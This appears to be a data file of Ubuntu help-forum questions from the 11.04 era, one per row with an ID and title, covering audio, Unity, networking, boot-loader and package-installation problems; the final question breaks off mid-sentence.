45477	sb x-fi surround 5.1 usb on lubuntu	i 'm having trouble after installing lubuntu-desktop on top of a ubuntu server ( 64 bit ) . the problem is that i can not get my x-fi external usb soundcard to work without horrible hacks , and even then at best it only works in some applications . i can currently only play media in vlc media player using the following hack in my ~./asoundrc pcm . ! default { type hw card 1 } ctl . ! default { type hw card 1 } this works as expected , but not for many applications ( which fail to launch , with a error message related to below ( no mixer controls ) ) ┌──────────────────────────── alsamixer v1.0.24.2 ────────────────────────────┐ │ card : sb x-fi surround 5.1 pro f1 : help │ │ chip : usb mixer f2 : system information │ │ view : f3 : playback f4 : capture f5 : all f6 : select sound card │ │ item : esc : exit │ │ │ │ │ │ this sound device does not have any controls . │ │ │ └─────────────────────────────────────────────────────────────────────────────┘ what could i be missing ? some diagnostic information ( any other information on request ) : daniel @ daniel-desktop : ~ $ aplay -l null discard all samples ( playback ) or generate zero samples ( capture ) front : card=intel , dev=0 hda intel , alc888 analog front speakers surround40 : card=intel , dev=0 hda intel , alc888 analog 4.0 surround output to front and rear speakers surround41 : card=intel , dev=0 hda intel , alc888 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=intel , dev=0 hda intel , alc888 analog 5.0 surround output to front , center and rear speakers surround51 : card=intel , dev=0 hda intel , alc888 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=intel , dev=0 hda intel , alc888 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=intel , dev=0 hda intel , alc888 digital iec958 ( s/pdif ) digital audio output dmix : card=intel , dev=0 hda intel , alc888 analog direct sample mixing device dmix : card=intel , dev=1 hda intel , alc888 digital direct sample mixing device dsnoop : card=intel , dev=0 hda intel , alc888 analog direct sample snooping device dsnoop : card=intel , dev=1 hda intel , alc888 digital direct sample snooping device hw : card=intel , dev=0 hda intel , alc888 analog direct hardware device without any conversions hw : card=intel , dev=1 hda intel , alc888 digital direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , alc888 analog hardware device with all software conversions plughw : card=intel , dev=1 hda intel , alc888 digital hardware device with all software conversions front : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio front speakers surround40 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio 4.0 surround output to front and rear speakers surround41 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio 5.0 surround output to front , center and rear speakers surround51 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio iec958 ( s/pdif ) digital audio output dmix : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio direct sample mixing device dmix : card=pro , dev=1 sb x-fi surround 5.1 pro , usb audio # 1 direct sample mixing device dsnoop : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio direct sample snooping device dsnoop : card=pro , dev=1 sb x-fi surround 5.1 pro , usb audio # 1 direct sample snooping device hw : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio direct hardware device without any conversions hw : card=pro , dev=1 sb x-fi surround 5.1 pro , usb audio # 1 direct hardware device without any conversions plughw : card=pro , dev=0 sb x-fi surround 5.1 pro , usb audio hardware device with all software conversions plughw : card=pro , dev=1 sb x-fi surround 5.1 pro , usb audio # 1 hardware device with all software conversions hdmi : card=hdmi , dev=0 hda ati hdmi , hdmi 0 hdmi audio output dmix : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct sample mixing device dsnoop : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct sample snooping device hw : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct hardware device without any conversions plughw : card=hdmi , dev=3 hda ati hdmi , hdmi 0 hardware device with all software conversions
45480	installing aclocal on ubuntu 11.04 ?	how can i install aclocal from the autotools bundle in ubuntu 11.04 ? i tried to find it to no avail : sudo apt-get install aclocal sudo apt-get install autotools-dev apt-cache search aclocal dpkg -s aclocal
45481	do n't allow users to change background image and desktop icons ?	is it possible to restrict users so they wo n't be able to change the desktop , i.e. , background image and icons ? i 'm running the latest ubuntu ( 11.04 )
45483	where is the powerpc version of 11.04 ?	anyone know where the powerpc iso for natty is ? i found the one for oneiric -- http : //cdimage.ubuntu.com/daily/current/ but there is not one for natty in http : //cdimage.ubuntu.com/ports/releases/
45486	massive graphical corruption when playing videos	after upgrade my ubuntu to 11.04 i have a weird problem playing videos . see the capture from my display . i 'm getting the same thing with all of the players and video file types . ubuntu 11.04 64bit ati mobility radeon hd 4650 here 's a screenshot ( from oli , that tries to do the video version justice ) :
45487	alternatives to truecrypt	hello . are there any alternatives to truecrypt that work out of the box and do n't require any installation ? i am looking for something built right into linux that i use to protect my data . encrypting the partition is also a good idea . what should i be looking at ?
45488	need new feature when browsing installed apps	when we browse installed apps , we need on right clik on app , information on the selected apps , possibility to initiate uninstall for the selected apps .
45490	show information on selected apps when browsing installed apps	when we browse installed apps , how can we get information on a app without to go in synaptic , apt-get or ubuntu software center . need a more info for the selected apps on right click ou on mouse over the selected app .
45493	why is the hard disk drive too hot ?	the hard disk drive got too hot after a while of running ubuntu . i 've checked the system monitor and there were n't any thing strange . i have packard bell easynote tj75 with ati card 512mb core i5 .
45494	is there an image of ubuntu + gnome3 available ?	is this available somewhere . i want an image with nothing of unity in it only gnome 3 . something like the new fedora . the problem is that when i tried gnome 3 in my current ubuntu install the installation was n't perfect . i just want to test a completely vanilla ubuntu with gnome 3 . it is a pity for users like me that there was no image provided on the official website . will an image be provided ? i do n't dislike unity but i was looking forward to try gnome 3 on ubuntu .
45496	should i symlink my /var/www directory to my home ?	i have just installed ubuntu server 10.04 with a lamp setup . i want to host a website there but i 'm not sure which is the best way to get/edit my files on the server . googling provides many options but i 'm not sure which is best ? unless there 's a better option , i 'd like to be create the pages on another pc ( windows or linux ) and use sftp to sync the changes to the server - but do i do this to a symlinked folder in ~/ or by changing rights on the /var/www/ folder ?
45499	how put a lotus notes in dash ?	i use lotus notes as the main program and would like have lotus as main email on dash , not evolution . how do i do this ? ubuntu 11.04 ( unity )
45503	how to install ktorrent 4.1.1 ?	already tried adding the kubuntu ppa ( which tipically worked for past ktorrent versions ( i always use ktorrent because of several advantages ) and it still appears like 4.0.5 in the repositories . what can i do to install the latest version ? note - also tried this ppa https : //launchpad.net/~jon-severinsson/+archive/ktorrent/+packages but i recommend not to use it since it gave me some crazy problems , like instead of upgrading ktorrent it deleted it and then did not let me install it .
45516	how to enhance the transparency of the unity 3d launcher ?	where is the background of the unity ( 3d ) launcher located ? i would like to enhance the transparency of the launcher to make it fit better with light themes ( such as radiance ) . the actual transparency of the launcher suits only with darker themes ( like ambiance ) . the file `` launcher_background_middle.png '' in /usr/share/unity/themes does n't seem to affect the launcher transparency , and i have n't yet found out where the launcher background is . it should be a picture that can be edited with gimp . thanks in advance for your help .
45521	how to navigate long commands faster ?	is there a way speed up linux cli navigation when i must enter long commands ? i simply use arrows right now , and - if i have a long command it takes some time to get from start of the command to the middle of it . is there a way to for example jump to the middle of the command without using arrows ?
45522	why does the messaging indicator display 3 instances of inbox ?	a couple of ( i believe ) interrelated questions regarding the messaging indicator : why does the ubuntu messaging indicator applet display 3 instances of inbox ? why does new email not show up in any of the inbox references ? i would be curious to know why new emails do not light the associated panel icon . these is no issue with being able to access and read new mail in evolution . additionally , popups indicate that new mail has arrived . in and of itself the above noted anomalies are something i can tolerate . however , this all worked prior to upgrading to 11.04 from 10.10 .
45523	change keybinding to show unity sidebar	i tend to use the super key in my keybindings ( e.g . move between workspaces , vim commands , etc . ) and holding the super key shows the sidebar . it 's really annoying especially if i 'm on the maximised window . is there a way to change this binding so that holding super does n't show the sidebar ? thanks .
45524	how to make my ubuntu show on a windows workgroup	it 's been a while that i 'm a owner of an ubuntu ( 10.10 ) laptop . in our office every one is using windows.and our workgroup is simply workgroup . i 've installed samba , and it 's conf is so : workgroup = workgroup # security = user [ share ] path = /media/repo/share // this is another partition browsable = yes guest ok = yes read only = no create mask = 0755 but still nobody can access my share folder and the machine can not being even seen on the network . but i can access others shared folders . is there anything i needed to do that i left out ? thanks for reading this
45527	how to keep an external hard drive spinning ?	i have an external usb hard drive plugged in , and after a few minutes , when there 's been no activity against it , it automatically spins down , stops , and is unmounted . is there a way to keep it spinning so i do n't lose the mount ? cheers
45529	chrome keeps opening maximized	chrome opens up in a maximized windows . no matter how many times i resize it down it stays the same on new windows . i tried resizing the windows then quitting chrome , but still no luck . if anything is there a way i can manually set the default window size through the shell or something ?
45531	is there a way to get the unity title bar behavior and nothing else ?	i know how to get app menus in the panel . i like the fact that in unity , the top panel effectively becomes the title bar for maximized windows . apart from that , unity is driving me up the pole . is there a way to get the unity window maximization behavior with ubuntu `` classic '' ?
45535	how do i clean up my dconf database ?	dconf is pretty young , yet my database is already a mess with lots of `` schema-less '' keys . is there a way to do some cleaning up , or would i need to start from scratch ( by removing ~/.config/dconf/user i guess ) ?
45536	window focus confusion in unity	i like having focus prevention set to high , so that i do n't have some stupid auto-launched app steal my typing in the middle of something else . unfortunately , unity keeps focus on the right window while raising the new one . a number of times , this has caused me to close an application by accident that had control of the menu bar , even though it was underneath the new window . is there a way to prevent raise without focus ?
45540	i can not install java . it locks	here is where it locks-up : setting up openjdk-6-jre-headless ( 6b20-1.9.7-0ubuntu1 ) ... even control-c does not stop it . i have to close the ssh session by closing the terminal . i have tried two packages : openjdk-6-jdk and ecj from javac . what to do now ? thanks in advance for any help .
45543	tar error : implausibly old time stamp 1970-01-01 00:00:00	my home directory is encrypted and i want to remove the encryption . i have performed the following actions and the problem occurs at step 4 : backed up ( encrypted ) home folder to /var/backup using sbackup utility deleted home folder : $ rm -rf /home/michael removed packages : $ apt-get remove ecryptfs-utils libecryptfs0 boot natty narwhal to root shell and restore home directory when attempting extract the backup tarball , the following error is returned : $ sudo tar xf files.tar tar : home/.ecryptfs/michael/.private/ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatghkopwaank8hckmcc2va1ak -- /ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatg1ab7dvydmjv48rab0zakb -- -/ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatgj3t3mqbaxonpmnpplaft5u -- /ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatg2go7nlmgf-x2eh31fsa9uu -- /ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatgv.heqdwdqzf9wxv2gjktse -- /ecryptfs_fnek_encrypted.fwzdi4zedbipc-qg6gshgtjgsc5ns3efhatg775duz66cvwfx9jvq55lpe -- : implausibly old time stamp 1970-01-01 00:00:00 this is n't what i had in mind . how can i resolve this problem ? thank you .
45548	disabling zeitgeist	i have zeitgeist daemon always in processes . i do n't see the point of this zeitgeist , it logs my activity . i removed it from startup programs , but it is still there . can i uninstall this package ? why do i need it at all ?
45552	bluetooth finally came on , but went off ?	i have a gateway nv series laptop with a bluetooth chip installed . i was running 10.04 and could n't seem to get my bluetooth chip to work ( there 's a light on the laptop which glows blue when bluetooth is running and enabled , i 've never actually seen it come on until today ) , and just today i wiped and reinstalled from scratch 11.04 . i saw the light come on ! it was amazing ! however , when i actually fired up the bluetooth application to pair my keyboard with it , it asked me if i wanted to turn bluetooth on . i clicked the `` yes '' button , and nothing happened . in the tray , i clicked the indicator and it asked me if i wanted to turn bluetooth off . i did , nothing happened . then , i tried turning it back on again , no dice . nothing changed in the preferences window , i had no way of pairing with any devices since the dialog was not there . this is what it looked like : things were n't working , so i popped a reboot . goodbye , blue light . it never came back on . this is now what i saw : i have a usb dongle on-hand which i thought i 'd use just to get the keyboard working , this is now what i see : i have installed every bluez-* package in the repos . what can i do to get this working ? it would be so nice to actually be able to use the bluetooth inside of my computer and not have to resort to an ugly , port-blocking usb dongle .
45560	unity stopped working after zeitgeist uninstall	in previous question i asked how to disable zeitgeist disabling zeitgeist . after i removed all packages , i was unable to find anything via unity launcher ! shortcuts to media apps , internet apps ... dont work . reinstalling zeitgeist didnt help . any idea how to recover unity ?
45563	concatenating avi videos	i have some avi videos from a vacation . the videos might have different frame rate and resolution , as they came from different cameras . what 's the easiest way to concatenate these videos ? is there an straightforward way to make simple edits ( rotating , cropping etc. ? ) i 've tried mencoder : mencoder -oac copy -ovc copy -o output.avi 1.avi 2.avi 3.avi but it fails for different fps . solution concatenate : openshot ( thanks , fossfreedom ! ) fps change : this answer from ubuntu forums rotate : avidemux to rotate .
45572	is it possible to change unity panel fonts or font size ?	is it possible to change the font or at least the font size of text in unity 's indicator panel ( for things like the clock and system indicator monitor ) without changing application font size from the appearance preferences > fonts settings ? i 'm using a small monitor and i 'd like just a wee bit more space for the global applications menu .
45574	intermittent ( each startup ) wi-fi with an edimax ew-7318usg	firstly , wi-fi works 100 % of the time on my ubuntu netbook , my android phone and my windows install ( on the same computer/usb-wifi device ) , so i do n't think this can be a router issue ... it would be strange if it were a driver issue as it sometimes connects , but fyi the usb-wifi device is a edimax ew-7318usg . second , if it does connect ( during this session ) then it connects first time , else it will not connect ( no matter how long i try ) . wi-fi does connect about 20 % of the time ( restarting the computer about 5 times usually allows me to connect ) . once it has connected it stays connected ( until restarted ) . obviously it is hugely irritating ! any ideas how i can remedy this ? edit : as requested , the results of running sudo lshw -class network : description : ethernet interface product : mcp77 ethernet vendor : nvidia corporation physical id : a bus info : pci @ 0000:00:0a.0 logical name : eth0 version : a2 serial : 00:19:66 : d3 : fe:21 capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : pm msi ht bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=forcedeth driverversion=0.64 latency=0 link=no maxlatency=20 mingnt=1 multicast=yes port=mii resources : irq:41 memory : fcf7c000-fcf7cfff ioport : c880 ( size=8 ) memory : fcf7e400-fcf7e4ff memory : fcf7e000-fcf7e00f *-network description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan0 serial : 00:0e:2e:4d : ff : b4 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=2.6.38-8-generic firmware=1.7 ip=192.168.2.6 link=yes multicast=yes wireless=ieee 802.11bg is this a known bug or should it be filed as one ? ( if so , which or against what ? ) .
45577	accidentally deleted ambiance theme	i can still use ambiance , but in the appearance windows it reads : `` this theme can not be displayed as it should , as the needed gtk+-theme 'ambiance ' is not installed '' where can i download it or fix this issue ?
45588	i want to move drivers out of my archive manager/file roller	i want to move drivers that are in my archive manager/ file roller to update manager , ubuntu software center or synaptic package manager
45590	youtube is not working , not supported by router ?	i just changed isp and router , but now i have a problem . it is no longer possible to see youtube movies , images from the page etc.. ytimg.com , which delivers the content ( videos , css , images ) on the youtube page is not working . if i run xp in virtualbox youtube works just fine , it also works if i plug the cable from the wan directly to my machine and set up pppoe . my android phone has the same problem with youtube . all other pages work as expected . the router may not support linux , but why are everythings other wokring page ? is it possible to fix this ? do you think i will have problems if i buy a linksys e4200 ?
45593	weather indicator not showing icons ?	i searched here and did n't see this question already posted , but my apologies if i already missed it . i 've noticed lately that my weather indicator applet is no longer showing weather icons . if i select it to pull information from google , i get this : however , if i select it to pull from yahoo , the weather icon displays in the notification area , but will not show icons in the forecast menu , like this : i 've tried completely removing and re-installing weather indicator without any success . any ideas ? edit : changing the icon theme does not seem to make any difference .
45594	where is virtualbox shared folders mounted in a virtual guest ?	when running ubuntu as a virtualbox , where is the automount of the shared folders ? it 's not in /etc/fstab so where else could it be ?
45595	what are the default permissions for the /sbin/ directory ?	pulled a chmod 777 / on accident yesterday , i 've recovered almost all of the permissions except a few folders , and i ca n't find what default permissions for /sbin/ anywhere .
45597	can i get the unity bar to not hide ?	title explains . please help as i do n't like not being able to see it the whole time .
45598	where to get dell inspiron 1545 drivers for the dell 1397 wlan minicard wireless card ?	i cant seem to find the drivers for my dell wireless wlan 1397 minicard for ubuntu 11.04 andone know how i can get them and install them im sort of new to ubuntu ?
45604	how to export x display with audio ?	how can i export my x display with audio . for example , in tty1 if i put , `` startx xmoto -- :1 & '' , i can play xmoto ok , but have no sound . if i put `` xinit -- :1 & '' and then put `` xmoto & '' , again i can play xmoto ok , but have no sound . the strange thing is the sound continues in tty1 ... if i go back to tty1 ( ctrl+alt+f1 ) i can hear the game , but in tty8 ( ctrl+alt+f8 ) didnt have sound . so , probably i need to know how to export the x display and the sound to tty8 , for example . thanks .
45607	how to mount partition permanently ?	i am using ubuntu minimal + lxde . i am wondering how can i auto-mount a partition ( internal ) on boot automatically . currently i do something like mount /dev/sda3 /works but i want it to be permanent . also i have gparted , but the partition > unmount is greyed out ( yes , unmount , even though i have n't mounted it )
45609	missing python.h when trying to install apache thrift	i have tried many times over to install thrift ( http : //thrift.apache.org/ ) in ubuntu server . i tried it on two machines ... and one i had nothing on it before ; meaning fresh ubuntu installation . i did : ./configure , no problems here . but then if i run make , everything stops working : creating build/temp.linux-i686-2.6 creating build/temp.linux-i686-2.6/src creating build/temp.linux-i686-2.6/src/protocol gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/python2.6 -c src/protocol/fastbinary.c -o build/temp.linux-i686-2.6/src/protocol/fastbinary.o src/protocol/fastbinary.c:20 : fatal error : python.h : no such file or directory compilation terminated . error : command 'gcc ' failed with exit status 1 make [ 3 ] : *** [ all-local ] error 1 make [ 3 ] : leaving directory `/root/thrift-0.6.0/lib/py' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/root/thrift-0.6.0/lib' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/root/thrift-0.6.0' make : *** [ all ] error 2 if i try to install python ; i get : apt-get install python2.6 reading package lists ... done building dependency tree reading state information ... done python2.6 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i have been search everywhere for an answer , but nothing . i am i the only one running into this problem ? is there a solution that exists ? i am not sure i feel my legs anymore : \ also , i tried to install php-dev but i get an error : e : unable to locate package php-dev i was able to install : php5-dev , is there a difference ? any help would be great thanks : |
45610	getting ubuntu minimal + lxde to automount usb drives	i am trying to get ubuntu minimal +_ lxde to auto mount my usb drives . currently i need to do pmount /dev/sdb1 manually . also i have lxde > preferences > automount all checked
45621	very high cpu usage ( 100 % ) from just browsing the web	i tested on firefox and chromioum . im at 100 % while loading pages which causes them to load slow and when i dont have a application running im at 40 % cpu ( at least ) everything is slow basically . im also already on ubuntu classic so im not using unity . should i go to 10.04 ? is that more stable ? on windows this wasnt an issue . i have a dual boot with xp and a 2.4ghz intel celeron with 768mb ram and an nvidia 6200 graphics card . i heard 10.04 was the most stable . any suggestions ?
45622	how to resume the upgrade of package downloads ( 10.04 - > 10.10 )	i was trying to upgrade my 10.04 machine to 10.10 via the update manager . it was downloading the packages ( was not installing it ) . since i had to leave my place , i cancelled it in order to be able to resume it today . but somehow , i do n't find the upgrade option in the update manager anymore . any command line alternative to this ? i tried : sudo apt-get dist-upgrade but it said : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . what 's wrong ?
45625	is ati working on unity 3d ?	before i had ati running , but unity was corrupt and laggy . now , i do n't have installed and everything is better . i am just wondering if it is safe to turn it back on ?
45628	what tweetdeck , or gwibber alternatives are there that support facebook ?	tweetdeck i really enjoyed until i installed ubuntu , as adobe does n't have a 64-bit version of adobe air ( which is necessary to run tweetdeck ) so i ca n't use it anymore . are there any alternatives that support facebook ? note - there is a similar question - but this has been reopened to be specific to facebook support : what microblogging clients are available ?
45630	how do i hide the unity launcher when clementine is running ?	everytime i start clementine , my unity launcher will stop hiding and will always remain on the foreground . i have tried setting `` hide launcher '' to `` dodge windows '' , `` dodge active window '' , and to `` autohide '' , but it still does n't hide . now i am forced to use the `` never '' setting , because otherwise i ca n't use a part of my screen . can anyone tell me how i can run clementine and hide the launcher at the same time ? i really like clementine !
45631	any file executed once when system starts up	is there any config file that is evaluated once , everytime operating system starts up . bashrc does not qualifies since it gets evaluated everytime a gnome terminal starts..
45632	skype aborted when starting	hi . i got a problem with skype . when i turn it on , it 's not showing . i tried from command line and here 's what i got : nicolas @ foundation : ~ $ skype aborted how can i solve that ?
45640	how to convert .avi video to .mp4 ( for motorola milestone , android 2.3.4 ) with avidemux	i open .avi video with avidemux and i set video format to mpeg-4 avc ( under configure , bitrate tab i choose `` single pass - bitrate ( average ) '' and target bitrate to 256 kb/s , under filters i choose mplayer resize to 480x360 and i also add a subtitles ) audio format to aac ( faac ) ( under configure , i choose bitrate 96 ) and format to mp4 ( like a image below ) . when avidemux convert video to .mp4 format i can play the file on my copmuter , but on my phone i ca n't . when i want to play it on my phone with native video player , it just show the error something like `` ca n't play this video '' . so the question is how to convert .avi video to .mp4 with avidemux ( because i want to have subtitles inside movie ) to be playable with android phone ( android version 2.3.4 ) with native player . any help will be highly appreciated . : )
45641	differences between first ( initial ) user and other users ?	the user created by ubuntu on install is different than the ones you create using the `` users and groups '' tool - the user is `` custom '' not `` administrator '' . besides being able to `` sudo '' , what are the other differences ? is it just groups and privileges , or is there something else ? does install do anything else , like creating folders , files , config , that can not or are not done using the `` users and groups '' tool ? somewhat related question : users and groups administration tool - what do the options in user privileges tab of advanced settings do ?
45644	adding eclipse cdt to an existing eclipse jdt installation	i 'm a java developer who wants to start with c/c++ now . i have an eclipse jdt installation , and today added the cdt feature plugin from inside eclipse ( help- > install new software..- > and so on ) i restarted eclipse , but i can not see the c/c++ perspective and can not create anything else than java project . googled on it , but found nothing special . then i opened a terminal and did a sudo apt-get install eclipse-cdt . started eclipse again but nothing changed . i know there are downloadable eclipse cdt packs , but i would not like to use them . what should i do ? using : eclipse galileo on ubuntu 11.04
45645	differences between bonjour/avahi/people-nearby protocols	i recently discovered , through ubuntu 's empathy im client , that exists a protocol that enables the user to talk with anyone on his actual local network . it seems empathy calls this service `` people nearby '' and windows `` people near me '' . after some research i discovered more information : it seems the `` protocol '' is called avahi ( or bonjour/salut ( ? ) by apple ) and permits a user to connect to users , printers and files on the network . my questions : bonjour , avahi , people nearby , people nearby ... are these things different names for the same thing , i.e . to connect to `` things '' ( users/printers/files ) on the same network ? are these different implementations of zeroconf ? which im support this kind of protocol ? aim , trillian and empathy support it , am i right ? which of them are usable on a smartphone ( android ) ? i think trillian does and wichat too but only for ios . is there an android app that implements a bonjour 's or avahi 's service for instant messaging ?
45647	users and groups administration tool - what do the options in user privileges tab of advanced settings do ?	how does the `` user privileges '' tab in the advanced settings of users and groups gui work ? i mean this window : does it simply add or remove the user from certain groups , or is there something else ? if so , why only a few groups are represented there ? i mean , how does ubuntu/gnome/whatever decide which groups appear in that list ? and where does the `` description '' for each `` privilege '' comes from ? as a side-note , ive always been amazed of how incredibly terrible this gui is : documentation is laughable , to say the least ( click help and see : only 3 pages , very outdated screenshots , obsolete and incomplete instructions , and not a single word on the advanced settings at all ) , also the design is completely counter-intuitive : theres no list at all of the groups a user belongs to . one must click `` manage groups '' and click properties for each and every group to see its users . come on ! how come such a major and ancient thing like users and groups management still have no decent gui ?
45653	how do i back up my pgp key	i am about to upgrade my computer to 11.04 . but before i do i want to backup my pgp key that i use for signing my ubuntu .deb packages . so that if something goes wrong in the upgrade i do n't lose it . how to i go about backing up my pgp key ?
45657	ubuntu minimal install iso with luks support ?	so if i want to encrypt my whole hdd with e.g . : luks ( are there any better solutions ? - e.g . : in performance ? ) then i have to download & burn a `` ubuntu-11.04-alternate-amd64.iso '' cd . that 's ok , i understand . the question : are there any minimal iso 's ( like the debian netinstall cd ) *with luks support ? so that i just have to download an iso that weights a couple of mbyte 's and install it using luks so that i could have a fully encrypted hdd ?
45660	how do i search a particular directory with tracker-search-tool	i have directories like ~work ~school ~movies . is it possible to search for files in only one of those directories with tracker-search-tool ( or with tracker in general ) ?
45662	does flash 10.3 support hardware acceleration ?	i 've just discovered that it is possible to get flash 10.2 ( with some tweeks ) to work on ubuntu with full hardware acceleration . does this mean hardware acceleration is fully supported in flash 10.03 on ubuntu without manual tweeks ?
45664	how to really customize an `` ubuntu-11.04-alternate-amd64.iso '' image ?	i have a dream : ) i want to customize an `` ubuntu-11.04-alternate-amd64.iso '' image . what is the best software/solution for it ? i want to customize these things ( all of them is needed ) : - customized package list : i do n't need all that comes with the default install , but i have a few thats not inc. in the def . install . - gui : i do n't want a desktop environment in it , i only want to use the openbox wm - i want a `` half-automated '' install : the installer only asks for : 1 encryption password + timezone + 1 username/password - > so e.g . : the installer automatically creates an encrypted volumegroup with the given password ( partitions : 256 mb /boot + vg get 's the rest of the place : in the vg : 10 gbyte to / and 2 gbyte to swap and the rest goes to /home ) . - i mean with full encryption . - automatically configure a few apps : e.g . : google chrome/firefox - e.g . : auto install wot+noscript in them - automatically install & configure : grsecurity ; pax ; pro police ; digsig - configure in a way that the os will do all the updates automatically without user interaction - set file associations , e.g . : vlc for all the video files , etc . - install a local dns cache + privoxy proxy & configure them to use as default , e.g . : ns : 127.0.0.1 , http/s proxy : 127.0.0.1:8118 - automatically set the iptables firewall rules that i provide . thanks for any help reaching my goal . have a nice day p.s . : and all that in one iso image file ( so not like e.g . : boot from a pxe server , i need a custom image in my hand that already contains the needed packages ( even extra pack . ) not that it downloads them when installing : p )
45666	is it possible to skip releases during an upgrade ?	is it possible to upgrade a 10.04 lucid installation to 11.04 natty , without upgrading to 10.10 first ? what about other versions ?
45668	removing 'applications ' from unity launcher while still accessing it using shortcut	is it possible to remove/hide 'applications ' from launcher , but i still want to access it using shortcut keys ( super+a ) , i know the method to remove the lenses , but i would like to keep them installed , just not show the icon on the launcher .
45671	turning off power to nvidia graphics card	i have an acer 5742g laptop with the nvidia 540m graphics card . after i upgraded to 11.04 i have been experiencing serious battery and overheating issue . up until 10.10 i was able to put this thing on my lap and use it for straight 3 hours maximum . but now it has been reduced to half . power top shows i am using 20-24w power , while previously it never exceeded 15w . i presume the reason is something to do with nvidia graphics card . i had not installed anything for the graphics card in 10.10 but did so in 11.04 right after the install . how do i totally turn off the whole thing and be sure my graphics card is not using any power . i got that card just to play games and that i do on windows , most the compiling i need is done at a good rate by my i3 processor and most of the time i am browsing and checking email . i do not need that graphics card to do anything . if this mean i have to downgrade to ubuntu classic or unity 2d that would not be a problem . another thing is powersave usually gives this the program 'rs : main q : reg ' is writing to file 'syslog ' on /dev/sda7 . this prevents the disk from going to powersave mode . is there a solution to this ? please tell how to i make sure my graphics card does not receive any power .
45672	upgrade jaunty jackalope	i 've an outdated jaunty installation on one of my server boxes ... trying to do a do-release-upgrade returns a an upgrade from 'jaunty ' to 'lucid ' is not supported with this tool . is there any way i can upgrade it to karmic and then step-by-step from there to lucid ? cheers
45673	is it possible to force the unity launcher to hide ? or to toggle hide/unhide with a keyboard shortcut ?	i would like to manually control when the launcher is shown or hidden . is it possible ? there is no option to `` never show launcher '' , nor have i found a way to force the launcher to hide .
45676	`` fastestmirror '' like plugin for ubuntu ?	are there any plugins for apt like the fastestmirror on e.g . : fedora ? so that the selected repo mirror for ubuntu is always fast ( because the plugin always uses the fastest server ) thank you !
45678	stdin : error 0 - what does it mean ?	in the course of my adventures in ubuntu , i 've encountered the mysterious black screen with the single line stdin : error 0 at boot many times . but what does it mean ? is it kernel level ? is it bootloader ? or is it just a generic error that means `` oops '' ?
45679	ssh connection problem with `` host key verification failed ... '' error	i can connect to another ubuntu machine in my lan via ssh . on both of then pc 's i installed openssh-server but from another ubuntu computer i can not connect to my pc via ssh and i got this error : '' host key verification failed ... ''
45682	can not get to grub after addition of new win7 drive and install of 11.04	the tl : dr on this is that i had a working dual-boot . i then added a new drive with win7 . which works fine and serves most of my needs , but i can not now get to linux . i 'd like to get to linux without messing with my win7 mbr ( e.g . installing grub on the linux drive and changing the bios boot order or using the windows boot loader to get to grub ) . i installed using 11.04 ( over the existing 10.04 which may have been a mistake ) . i can still get into win7 ( so no change in behaviour ) but still can not get into grub / ubuntu . this may be the wrong place to ask as its a messy problem to unpick and not a simple question with answer , but thought i 'd try my luck . for more details , read on ... background . originally 2 - harddisks : 320gb - vista ( installed first ) 160gb - linux ( 10.04 upgraded over time from 8.04 ) - including a small swap partition which used to boot to grub to select windows or linux . i added a new drive ( ssd ) and installed windows 7 on it . i had some trouble getting the bios to recognise the drive to boot from , so swapped some of the sata cables around , which may have contributed to my later problems . i could now boot into windows 7 fine , but linux was now inaccessible . i first installed easybcd to windows and tried to auto-recognise linux , this did n't seems to work ( ca n't remember details unfortunately ) . then i used an 11.04 livecd and attempted to upgrade the 10.04 installation ( which was an option ) . towards the end of this i encountered many errors , which seem to relate to the change from grub to grub 2 ( as my 10.04 had been upgraded from originally 7 or 8 ) . i 've tried formatting the linux drive during the install and installing 11.04 in its place , which seems now to succeed , but then still can not boot into linux successfully . i have also performed the steps from the copy grub 2 files from the livecd instructions to the point where a reboot is required . however i then arrived at a grub prompt and could n't see how to perform the `` refresh the grub 2 menu with sudo update-grub '' step . typing sudo update-grub at this point was not recognised . current situation . i can choose from bios to boot into any of the 3 drives , or from a livecd . boot from new 120gb drive . windows bcp displayed . 1a . choose windows 7 - boot to windows successfully 1b . choose grub 2 ( based on easybcd autodetect ) - gives ext2 error ( see pic ) 1c . choose grub ( configured on easybcd based on original grub settings ) - goes to grub rescue prompt ( see pic ) boot from original 320gb windows - no boot menu , loads directly into vista boot from linux 160gb drive . ends up at grub rescue prompt ( see pic ) i 'd rather not change the windows 7 mbr from the linux install given that it 